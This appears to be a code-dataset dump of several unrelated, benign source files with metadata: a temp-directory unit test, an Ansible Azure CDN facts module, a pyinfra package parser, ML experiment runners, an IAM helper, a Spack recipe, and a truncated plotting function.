# Created by Synerty Pty Ltd # Copyright (C) 2013-2017 Synerty Pty Ltd (Australia) # # This software is open source, the MIT license applies. # # Website : http://www.synerty.com # Support : <EMAIL> import os import random import string import unittest from tempfile import mkstemp from pytmpdir.Directory import Directory, FileClobberError, isWindows class DirectoryTest(unittest.TestCase): @classmethod def makeRandomContents(cls, size=100): return ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(size)]) @classmethod def makeRandomDirectory(cls): directory = Directory() dirs = [''] def addRecursiveDirs(path): if len(dirs) > 20: return for d in range(5): newPath = os.path.join(path, cls.makeRandomContents(10)) # print "Creating new path %s" % newPath dirs.append(newPath) addRecursiveDirs(newPath) for x in range(10): f = directory.createFile(path=newPath, name=cls.makeRandomContents(10)) with f.open(write=True) as fobj: fobj.write(cls.makeRandomContents(4000)) addRecursiveDirs('') return directory # Create files with bad paths @unittest.skipUnless(isWindows, "Not Windows detected, skipping " "testCreateWindowsBadPaths.") def testCreateWindowsBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="\\abspath\\name1").pathName, 'abspath\\name1') self.assertEqual(d.createFile(pathName="relpath\\name2").pathName, "relpath\\name2") self.assertRaises(AssertionError, d.createFile, pathName="\\abspath\\dir1\\") self.assertRaises(AssertionError, d.createFile, pathName="relpath\\dir2\\") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateWindowsBadPaths") @unittest.skipIf(isWindows, "Windows detected, skipping testCreateLinuxBadPaths.") def testCreateLinuxBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="/abspath/name1").pathName, 'abspath/name1') self.assertEqual(d.createFile(pathName="relpath/name2").pathName, "relpath/name2") self.assertRaises(AssertionError, d.createFile, pathName="/abspath/dir1/") 
self.assertRaises(AssertionError, d.createFile, pathName="relpath/dir2/") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateLinuxBadPaths") def testDir(self): d = Directory() assert (os.path.isdir(d.path)) num = 10 for x in range(num): (fd, name) = mkstemp(dir=d.path) with os.fdopen(fd, 'w') as f: f.write(self.makeRandomContents()) d.scan() self.assertEqual(num, len(d.files)) for x in range(num): d.createFile(name=self.makeRandomContents(10)) d.createFile(path=self.makeRandomContents(10), name=self.makeRandomContents(10)) # Create a file that already exists d.createFile(pathName="clobber1") self.assertRaises(FileClobberError, d.createFile, pathName="clobber1") self.assertEqual(num * 3 + 1, len(d.files)) files = d.files[:] removeIndexes = list(range(0, len(files), 3)) [files[i].delete() for i in removeIndexes] self.assertEqual(len(d.files), len(files) - len(removeIndexes)) dirPath = d.path d = None self.assertFalse(os.path.isdir(dirPath)) print("COMPLETED makeRandomContents")
en
0.739476
# Created by Synerty Pty Ltd # Copyright (C) 2013-2017 Synerty Pty Ltd (Australia) # # This software is open source, the MIT license applies. # # Website : http://www.synerty.com # Support : <EMAIL> # print "Creating new path %s" % newPath # Create files with bad paths # Create a file that already exists
2.322644
2
library/azure_rm_cdnprofile_facts.py
mc-corey50/Azure-Ansible
0
6627876
<filename>library/azure_rm_cdnprofile_facts.py #!/usr/bin/python # # Copyright (c) 2018 <NAME>, <<EMAIL>>, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: azure_rm_cdnprofile_facts version_added: "2.8" short_description: Get Azure CDN profile facts description: - Get facts for a specific Azure CDN profile or all CDN profiles. options: name: description: - Limit results to a specific CDN profile. resource_group: description: - The resource group to search for the desired CDN profile tags: description: - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'. extends_documentation_fragment: - azure author: - "<NAME> <<EMAIL>>" - "Yunge Zhu <<EMAIL>>" ''' EXAMPLES = ''' - name: Get facts for one CDN profile azure_rm_cdnprofile_facts: name: Testing resource_group: TestRG - name: Get facts for all CDN profiles azure_rm_cdnprofile_facts: - name: Get facts by tags azure_rm_cdnprofile_facts: tags: - Environment:Test ''' RETURN = ''' cdnprofiles: description: List of CDN profiles. returned: always type: complex contains: resource_group: description: - Name of a resource group where the CDN profile exists. returned: always type: str sample: testGroup name: description: - Name of the CDN profile. returned: always type: str sample: Testing location: description: - Location of the CDN profile. type: str sample: WestUS id: description: - ID of the CDN profile. type: str sample: /subscriptions/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX/resourcegroups/cdntest/providers/Microsoft.Cdn/profiles/cdntest provisioning_state: description: - Provisioning status of the profile. type: str sample: Succeeded resource_state: description: - Resource status of the profile. 
type: str sample: Active sku: description: - The pricing tier, defines a CDN provider, feature list and rate of the CDN profile. type: str sample: standard_verizon type: description: - The type of the CDN profile. type: str sample: Microsoft.Cdn/profiles tags: description: - The tags of the CDN profile. type: list sample: [ {"foo": "bar"} ] ''' from ansible.module_utils.azure_rm_common import AzureRMModuleBase try: from azure.mgmt.cdn.models import ErrorResponseException from azure.common import AzureHttpError from azure.mgmt.cdn import CdnManagementClient except: # handled in azure_rm_common pass import re AZURE_OBJECT_CLASS = 'profiles' class AzureRMCdnprofileFacts(AzureRMModuleBase): """Utility class to get Azure CDN profile facts""" def __init__(self): self.module_args = dict( name=dict(type='str'), resource_group=dict(type='str'), tags=dict(type='list') ) self.results = dict( changed=False, cdnprofiles=[] ) self.name = None self.resource_group = None self.tags = None self.cdn_client = None super(AzureRMCdnprofileFacts, self).__init__( derived_arg_spec=self.module_args, supports_tags=False, facts_module=True ) def exec_module(self, **kwargs): for key in self.module_args: setattr(self, key, kwargs[key]) self.cdn_client = self.get_cdn_client() if self.name and not self.resource_group: self.fail("Parameter error: resource group required when filtering by name.") if self.name: self.results['cdnprofiles'] = self.get_item() elif self.resource_group: self.results['cdnprofiles'] = self.list_resource_group() else: self.results['cdnprofiles'] = self.list_all() return self.results def get_item(self): """Get a single Azure CDN profile""" self.log('Get properties for {0}'.format(self.name)) item = None result = [] try: item = self.cdn_client.profiles.get( self.resource_group, self.name) except ErrorResponseException: pass if item and self.has_tags(item.tags, self.tags): result = [self.serialize_cdnprofile(item)] return result def list_resource_group(self): """Get all Azure 
CDN profiles within a resource group""" self.log('List all Azure CDNs within a resource group') try: response = self.cdn_client.profiles.list_by_resource_group( self.resource_group) except AzureHttpError as exc: self.fail('Failed to list all items - {0}'.format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def list_all(self): """Get all Azure CDN profiles within a subscription""" self.log('List all CDN profiles within a subscription') try: response = self.cdn_client.profiles.list() except Exception as exc: self.fail("Error listing all items - {0}".format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def serialize_cdnprofile(self, cdnprofile): ''' Convert a CDN profile object to dict. :param cdn: CDN profile object :return: dict ''' result = self.serialize_obj(cdnprofile, AZURE_OBJECT_CLASS) new_result = {} new_result['id'] = cdnprofile.id new_result['resource_group'] = re.sub('\\/.*', '', re.sub('.*resourcegroups\\/', '', result['id'])) new_result['name'] = cdnprofile.name new_result['type'] = cdnprofile.type new_result['location'] = cdnprofile.location new_result['resource_state'] = cdnprofile.resource_state new_result['sku'] = cdnprofile.sku.name new_result['provisioning_state'] = cdnprofile.provisioning_state new_result['tags'] = cdnprofile.tags return new_result def get_cdn_client(self): if not self.cdn_client: self.cdn_client = self.get_mgmt_svc_client(CdnManagementClient, base_url=self._cloud_environment.endpoints.resource_manager, api_version='2017-04-02') return self.cdn_client def main(): """Main module execution code path""" AzureRMCdnprofileFacts() if __name__ == '__main__': main()
<filename>library/azure_rm_cdnprofile_facts.py #!/usr/bin/python # # Copyright (c) 2018 <NAME>, <<EMAIL>>, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: azure_rm_cdnprofile_facts version_added: "2.8" short_description: Get Azure CDN profile facts description: - Get facts for a specific Azure CDN profile or all CDN profiles. options: name: description: - Limit results to a specific CDN profile. resource_group: description: - The resource group to search for the desired CDN profile tags: description: - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'. extends_documentation_fragment: - azure author: - "<NAME> <<EMAIL>>" - "Yunge Zhu <<EMAIL>>" ''' EXAMPLES = ''' - name: Get facts for one CDN profile azure_rm_cdnprofile_facts: name: Testing resource_group: TestRG - name: Get facts for all CDN profiles azure_rm_cdnprofile_facts: - name: Get facts by tags azure_rm_cdnprofile_facts: tags: - Environment:Test ''' RETURN = ''' cdnprofiles: description: List of CDN profiles. returned: always type: complex contains: resource_group: description: - Name of a resource group where the CDN profile exists. returned: always type: str sample: testGroup name: description: - Name of the CDN profile. returned: always type: str sample: Testing location: description: - Location of the CDN profile. type: str sample: WestUS id: description: - ID of the CDN profile. type: str sample: /subscriptions/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX/resourcegroups/cdntest/providers/Microsoft.Cdn/profiles/cdntest provisioning_state: description: - Provisioning status of the profile. type: str sample: Succeeded resource_state: description: - Resource status of the profile. 
type: str sample: Active sku: description: - The pricing tier, defines a CDN provider, feature list and rate of the CDN profile. type: str sample: standard_verizon type: description: - The type of the CDN profile. type: str sample: Microsoft.Cdn/profiles tags: description: - The tags of the CDN profile. type: list sample: [ {"foo": "bar"} ] ''' from ansible.module_utils.azure_rm_common import AzureRMModuleBase try: from azure.mgmt.cdn.models import ErrorResponseException from azure.common import AzureHttpError from azure.mgmt.cdn import CdnManagementClient except: # handled in azure_rm_common pass import re AZURE_OBJECT_CLASS = 'profiles' class AzureRMCdnprofileFacts(AzureRMModuleBase): """Utility class to get Azure CDN profile facts""" def __init__(self): self.module_args = dict( name=dict(type='str'), resource_group=dict(type='str'), tags=dict(type='list') ) self.results = dict( changed=False, cdnprofiles=[] ) self.name = None self.resource_group = None self.tags = None self.cdn_client = None super(AzureRMCdnprofileFacts, self).__init__( derived_arg_spec=self.module_args, supports_tags=False, facts_module=True ) def exec_module(self, **kwargs): for key in self.module_args: setattr(self, key, kwargs[key]) self.cdn_client = self.get_cdn_client() if self.name and not self.resource_group: self.fail("Parameter error: resource group required when filtering by name.") if self.name: self.results['cdnprofiles'] = self.get_item() elif self.resource_group: self.results['cdnprofiles'] = self.list_resource_group() else: self.results['cdnprofiles'] = self.list_all() return self.results def get_item(self): """Get a single Azure CDN profile""" self.log('Get properties for {0}'.format(self.name)) item = None result = [] try: item = self.cdn_client.profiles.get( self.resource_group, self.name) except ErrorResponseException: pass if item and self.has_tags(item.tags, self.tags): result = [self.serialize_cdnprofile(item)] return result def list_resource_group(self): """Get all Azure 
CDN profiles within a resource group""" self.log('List all Azure CDNs within a resource group') try: response = self.cdn_client.profiles.list_by_resource_group( self.resource_group) except AzureHttpError as exc: self.fail('Failed to list all items - {0}'.format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def list_all(self): """Get all Azure CDN profiles within a subscription""" self.log('List all CDN profiles within a subscription') try: response = self.cdn_client.profiles.list() except Exception as exc: self.fail("Error listing all items - {0}".format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def serialize_cdnprofile(self, cdnprofile): ''' Convert a CDN profile object to dict. :param cdn: CDN profile object :return: dict ''' result = self.serialize_obj(cdnprofile, AZURE_OBJECT_CLASS) new_result = {} new_result['id'] = cdnprofile.id new_result['resource_group'] = re.sub('\\/.*', '', re.sub('.*resourcegroups\\/', '', result['id'])) new_result['name'] = cdnprofile.name new_result['type'] = cdnprofile.type new_result['location'] = cdnprofile.location new_result['resource_state'] = cdnprofile.resource_state new_result['sku'] = cdnprofile.sku.name new_result['provisioning_state'] = cdnprofile.provisioning_state new_result['tags'] = cdnprofile.tags return new_result def get_cdn_client(self): if not self.cdn_client: self.cdn_client = self.get_mgmt_svc_client(CdnManagementClient, base_url=self._cloud_environment.endpoints.resource_manager, api_version='2017-04-02') return self.cdn_client def main(): """Main module execution code path""" AzureRMCdnprofileFacts() if __name__ == '__main__': main()
en
0.63955
#!/usr/bin/python # # Copyright (c) 2018 <NAME>, <<EMAIL>>, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) --- module: azure_rm_cdnprofile_facts version_added: "2.8" short_description: Get Azure CDN profile facts description: - Get facts for a specific Azure CDN profile or all CDN profiles. options: name: description: - Limit results to a specific CDN profile. resource_group: description: - The resource group to search for the desired CDN profile tags: description: - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'. extends_documentation_fragment: - azure author: - "<NAME> <<EMAIL>>" - "Yunge Zhu <<EMAIL>>" - name: Get facts for one CDN profile azure_rm_cdnprofile_facts: name: Testing resource_group: TestRG - name: Get facts for all CDN profiles azure_rm_cdnprofile_facts: - name: Get facts by tags azure_rm_cdnprofile_facts: tags: - Environment:Test cdnprofiles: description: List of CDN profiles. returned: always type: complex contains: resource_group: description: - Name of a resource group where the CDN profile exists. returned: always type: str sample: testGroup name: description: - Name of the CDN profile. returned: always type: str sample: Testing location: description: - Location of the CDN profile. type: str sample: WestUS id: description: - ID of the CDN profile. type: str sample: /subscriptions/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX/resourcegroups/cdntest/providers/Microsoft.Cdn/profiles/cdntest provisioning_state: description: - Provisioning status of the profile. type: str sample: Succeeded resource_state: description: - Resource status of the profile. type: str sample: Active sku: description: - The pricing tier, defines a CDN provider, feature list and rate of the CDN profile. type: str sample: standard_verizon type: description: - The type of the CDN profile. type: str sample: Microsoft.Cdn/profiles tags: description: - The tags of the CDN profile. 
type: list sample: [ {"foo": "bar"} ] # handled in azure_rm_common Utility class to get Azure CDN profile facts Get a single Azure CDN profile Get all Azure CDN profiles within a resource group Get all Azure CDN profiles within a subscription Convert a CDN profile object to dict. :param cdn: CDN profile object :return: dict Main module execution code path
2.109573
2
pyinfra/facts/util/packaging.py
ryan109/pyinfra
1
6627877
# pyinfra # File: pyinfra/facts/util/packaging.py # Desc: common functions for packaging facts import re def parse_packages(regex, output, lower=True): packages = {} for line in output: matches = re.match(regex, line) if matches: # Sort out name name = matches.group(1) if lower: name = name.lower() packages.setdefault(name, set()) packages[name].add(matches.group(2)) return packages
# pyinfra # File: pyinfra/facts/util/packaging.py # Desc: common functions for packaging facts import re def parse_packages(regex, output, lower=True): packages = {} for line in output: matches = re.match(regex, line) if matches: # Sort out name name = matches.group(1) if lower: name = name.lower() packages.setdefault(name, set()) packages[name].add(matches.group(2)) return packages
en
0.649417
# pyinfra # File: pyinfra/facts/util/packaging.py # Desc: common functions for packaging facts # Sort out name
2.746058
3
Adversarial Label Learning/experiments/default_reader.py
VTCSML/Adversarial-Label-Learning
1
6627878
<filename>Adversarial Label Learning/experiments/default_reader.py import numpy as np import json def create_weak_signal_view(path, views, load_and_process_data): """ :param path: relative path to the dataset :type: string :param views: dictionary containing the index of the weak signals where the keys are numbered from 0 :type: dict :param load_and_process_data: method that loads the dataset and process it into a table form :type: function :return: tuple of data and weak signal data :return type: tuple """ data = load_and_process_data(path) train_data, train_labels = data['training_data'] val_data, val_labels = data['validation_data'] test_data, test_labels = data['test_data'] weak_signal_train_data = [] weak_signal_val_data = [] weak_signal_test_data = [] for i in range(len(views)): f = views[i] weak_signal_train_data.append(train_data[:, f:f+1]) weak_signal_val_data.append(val_data[:, f:f+1]) weak_signal_test_data.append(test_data[:, f:f+1]) weak_signal_data = [weak_signal_train_data, weak_signal_val_data, weak_signal_test_data] return data, weak_signal_data def run_experiment(run, save, views, datapath, load_and_process_data, savepath): """ :param run: method that runs real experiment given data :type: function :param save: method that saves experiment results to JSON file :type: function :param views: dictionary of indices for the weak signals :type: dict :param datapath: relative path to the dataset :type: string :param load_and_process_data: default method to load and process the given dataset :type: function :param savepath: relative path to save the results of the experiments :type: string :return: none """ # set up your variables total_weak_signals = 3 num_experiments = 1 for i in range(num_experiments): data, weak_signal_data = create_weak_signal_view(datapath, views, load_and_process_data) for num_weak_signal in range(1, total_weak_signals + 1): adversarial_model, weak_model = run(data, weak_signal_data, num_weak_signal) print("Saving results to 
file...") # save(adversarial_model, weak_model, savepath) def run_dep_error_exp(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ # set up your variables num_experiments = 10 all_accuracy = [] baseline_accuracy = [] ge_accuracy = [] weak_signal_accuracy = [] data, weak_signal_data = data_and_weak_signal_data for num_weak_signal in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal + 1) all_accuracy.append(output['ALL']) baseline_accuracy.append(output['AVG']) ge_accuracy.append(output['GE']) weak_signal_accuracy.append(output['WS']) print("Saving results to file...") filename = path output = {} output ['ALL'] = all_accuracy output['GE'] = ge_accuracy output['AVG'] = baseline_accuracy output ['WS'] = weak_signal_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close() def run_bounds_experiment(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ data, weak_signal_data = data_and_weak_signal_data # set up your variables num_weak_signal = 3 num_experiments = 100 errors = [] accuracies = [] ineq_constraints = [] weak_signal_ub = [] weak_test_accuracy = [] bounds = np.linspace(0, 1, num_experiments) for i in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal, bounds[i]) errors.append(output['error_bound']) accuracies.append(output['test_accuracy']) ineq_constraints.append(output['ineq_constraint']) weak_signal_ub.append(output['weak_signal_ub']) 
weak_test_accuracy.append(output['weak_test_accuracy']) print("Saving results to file...") filename = path output = {} output ['Error bound'] = errors output['Accuracy'] = accuracies output['Ineq constraint'] = ineq_constraints output ['Weak_signal_ub'] = weak_signal_ub output['Weak_test_accuracy'] = weak_test_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close()
<filename>Adversarial Label Learning/experiments/default_reader.py import numpy as np import json def create_weak_signal_view(path, views, load_and_process_data): """ :param path: relative path to the dataset :type: string :param views: dictionary containing the index of the weak signals where the keys are numbered from 0 :type: dict :param load_and_process_data: method that loads the dataset and process it into a table form :type: function :return: tuple of data and weak signal data :return type: tuple """ data = load_and_process_data(path) train_data, train_labels = data['training_data'] val_data, val_labels = data['validation_data'] test_data, test_labels = data['test_data'] weak_signal_train_data = [] weak_signal_val_data = [] weak_signal_test_data = [] for i in range(len(views)): f = views[i] weak_signal_train_data.append(train_data[:, f:f+1]) weak_signal_val_data.append(val_data[:, f:f+1]) weak_signal_test_data.append(test_data[:, f:f+1]) weak_signal_data = [weak_signal_train_data, weak_signal_val_data, weak_signal_test_data] return data, weak_signal_data def run_experiment(run, save, views, datapath, load_and_process_data, savepath): """ :param run: method that runs real experiment given data :type: function :param save: method that saves experiment results to JSON file :type: function :param views: dictionary of indices for the weak signals :type: dict :param datapath: relative path to the dataset :type: string :param load_and_process_data: default method to load and process the given dataset :type: function :param savepath: relative path to save the results of the experiments :type: string :return: none """ # set up your variables total_weak_signals = 3 num_experiments = 1 for i in range(num_experiments): data, weak_signal_data = create_weak_signal_view(datapath, views, load_and_process_data) for num_weak_signal in range(1, total_weak_signals + 1): adversarial_model, weak_model = run(data, weak_signal_data, num_weak_signal) print("Saving results to 
file...") # save(adversarial_model, weak_model, savepath) def run_dep_error_exp(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ # set up your variables num_experiments = 10 all_accuracy = [] baseline_accuracy = [] ge_accuracy = [] weak_signal_accuracy = [] data, weak_signal_data = data_and_weak_signal_data for num_weak_signal in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal + 1) all_accuracy.append(output['ALL']) baseline_accuracy.append(output['AVG']) ge_accuracy.append(output['GE']) weak_signal_accuracy.append(output['WS']) print("Saving results to file...") filename = path output = {} output ['ALL'] = all_accuracy output['GE'] = ge_accuracy output['AVG'] = baseline_accuracy output ['WS'] = weak_signal_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close() def run_bounds_experiment(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ data, weak_signal_data = data_and_weak_signal_data # set up your variables num_weak_signal = 3 num_experiments = 100 errors = [] accuracies = [] ineq_constraints = [] weak_signal_ub = [] weak_test_accuracy = [] bounds = np.linspace(0, 1, num_experiments) for i in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal, bounds[i]) errors.append(output['error_bound']) accuracies.append(output['test_accuracy']) ineq_constraints.append(output['ineq_constraint']) weak_signal_ub.append(output['weak_signal_ub']) 
weak_test_accuracy.append(output['weak_test_accuracy']) print("Saving results to file...") filename = path output = {} output ['Error bound'] = errors output['Accuracy'] = accuracies output['Ineq constraint'] = ineq_constraints output ['Weak_signal_ub'] = weak_signal_ub output['Weak_test_accuracy'] = weak_test_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close()
en
0.679768
:param path: relative path to the dataset :type: string :param views: dictionary containing the index of the weak signals where the keys are numbered from 0 :type: dict :param load_and_process_data: method that loads the dataset and process it into a table form :type: function :return: tuple of data and weak signal data :return type: tuple :param run: method that runs real experiment given data :type: function :param save: method that saves experiment results to JSON file :type: function :param views: dictionary of indices for the weak signals :type: dict :param datapath: relative path to the dataset :type: string :param load_and_process_data: default method to load and process the given dataset :type: function :param savepath: relative path to save the results of the experiments :type: string :return: none # set up your variables # save(adversarial_model, weak_model, savepath) :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string # set up your variables :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string # set up your variables
3.085178
3
gcloud/iam_auth/resource_helpers/base.py
springborland/bk-sops
1
6627879
<gh_stars>1-10 # -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from iam import Resource, Subject from iam.contrib.tastypie.resource import IAMResourceHelper from gcloud.iam_auth.conf import SYSTEM_ID class SimpleSubjectEnvHelperMixin(object): def get_subject_for_alter_list(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_list(self, request, data): return {} def get_subject_for_alter_detail(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_detail(self, request, data): return {} class SimpleResourceHelper(SimpleSubjectEnvHelperMixin, IAMResourceHelper): def __init__(self, type, id_field, creator_field, name_field, *args, **kwargs): self.type = type self.id_field = id_field self.creator_field = creator_field self.name_field = name_field super().__init__(*args, **kwargs) def get_resources(self, bundle): attributes = {} if self.creator_field: attributes["iam_resource_owner"] = getattr(bundle.obj, self.creator_field) if self.name_field: attributes["name"] = getattr(bundle.obj, self.name_field) return [Resource(SYSTEM_ID, self.type, str(getattr(bundle.obj, self.id_field)), attributes)] def get_resources_id(self, bundle): return getattr(bundle.obj, self.id_field)
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from iam import Resource, Subject from iam.contrib.tastypie.resource import IAMResourceHelper from gcloud.iam_auth.conf import SYSTEM_ID class SimpleSubjectEnvHelperMixin(object): def get_subject_for_alter_list(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_list(self, request, data): return {} def get_subject_for_alter_detail(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_detail(self, request, data): return {} class SimpleResourceHelper(SimpleSubjectEnvHelperMixin, IAMResourceHelper): def __init__(self, type, id_field, creator_field, name_field, *args, **kwargs): self.type = type self.id_field = id_field self.creator_field = creator_field self.name_field = name_field super().__init__(*args, **kwargs) def get_resources(self, bundle): attributes = {} if self.creator_field: attributes["iam_resource_owner"] = getattr(bundle.obj, self.creator_field) if self.name_field: attributes["name"] = getattr(bundle.obj, self.name_field) return [Resource(SYSTEM_ID, self.type, str(getattr(bundle.obj, self.id_field)), attributes)] def get_resources_id(self, bundle): return getattr(bundle.obj, self.id_field)
en
0.864615
# -*- coding: utf-8 -*- Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
1.768611
2
var/spack/repos/builtin/packages/timedatex/package.py
player1537-forks/spack
11
6627880
<reponame>player1537-forks/spack<filename>var/spack/repos/builtin/packages/timedatex/package.py # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Timedatex(MakefilePackage): """timedatex is a D-Bus service that implements the org.freedesktop.timedate1 interface. It can be used to read and set the system clock, the real-time clock (RTC), the system timezone, get a list of valid timezones, and enable or disable an NTP client installed on the system. It is a replacement for the systemd-timedated service.""" homepage = "https://github.com/mlichvar/timedatex" url = "https://github.com/mlichvar/timedatex/archive/v0.6.tar.gz" version('0.6', sha256='6e24c015769ee49a92bde3b1f167e25119068a00e377f9e4187a425c262ce964') version('0.5', sha256='bc54960bb9554bb2b34985ba2b8a78480db568c3c6a9d26f2ab34de1bc0aab11') version('0.4', sha256='204285eb03c6cec9ae1c7fdb99e7c996259ec5a918d72bf6bc28564a6f738d4a') depends_on('glib') def install(self, spec, prefix): make('install', 'prefix={0}'.format(prefix))
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Timedatex(MakefilePackage): """timedatex is a D-Bus service that implements the org.freedesktop.timedate1 interface. It can be used to read and set the system clock, the real-time clock (RTC), the system timezone, get a list of valid timezones, and enable or disable an NTP client installed on the system. It is a replacement for the systemd-timedated service.""" homepage = "https://github.com/mlichvar/timedatex" url = "https://github.com/mlichvar/timedatex/archive/v0.6.tar.gz" version('0.6', sha256='6e24c015769ee49a92bde3b1f167e25119068a00e377f9e4187a425c262ce964') version('0.5', sha256='bc54960bb9554bb2b34985ba2b8a78480db568c3c6a9d26f2ab34de1bc0aab11') version('0.4', sha256='204285eb03c6cec9ae1c7fdb99e7c996259ec5a918d72bf6bc28564a6f738d4a') depends_on('glib') def install(self, spec, prefix): make('install', 'prefix={0}'.format(prefix))
en
0.788173
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) timedatex is a D-Bus service that implements the org.freedesktop.timedate1 interface. It can be used to read and set the system clock, the real-time clock (RTC), the system timezone, get a list of valid timezones, and enable or disable an NTP client installed on the system. It is a replacement for the systemd-timedated service.
2.073464
2
dynamo/plot/scPotential.py
davisidarta/dynamo-release
0
6627881
<reponame>davisidarta/dynamo-release from ..tools.utils import update_dict from .utils import save_fig def show_landscape(adata, Xgrid, Ygrid, Zgrid, basis="umap", save_show_or_return='show', save_kwargs={}, ): """Plot the quasi-potential landscape. Parameters ---------- adata: :class:`~anndata.AnnData` AnnData object that contains Xgrid, Ygrid and Zgrid data for visualizing potential landscape. Xgrid: `numpy.ndarray` x-coordinates of the Grid produced from the meshgrid function. Ygrid: `numpy.ndarray` y-coordinates of the Grid produced from the meshgrid function. Zgrid: `numpy.ndarray` z-coordinates or potential at each of the x/y coordinate. basis: `str` (default: umap) The method of dimension reduction. By default it is trimap. Currently it is not checked with Xgrid and Ygrid. save_show_or_return: {'show', 'save', 'return'} (default: `show`) Whether to save, show or return the figure. save_kwargs: `dict` (default: `{}`) A dictionary that will passed to the save_fig function. By default it is an empty dictionary and the save_fig function will use the {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} as its parameters. Otherwise you can provide a dictionary that properly modify those keys according to your needs. Returns ------- A 3D plot showing the quasi-potential of each cell state. """ if "grid_Pot_" + basis in adata.uns.keys(): Xgrid_, Ygrid_, Zgrid_ = ( adata.uns["grid_Pot_" + basis]["Xgrid"], 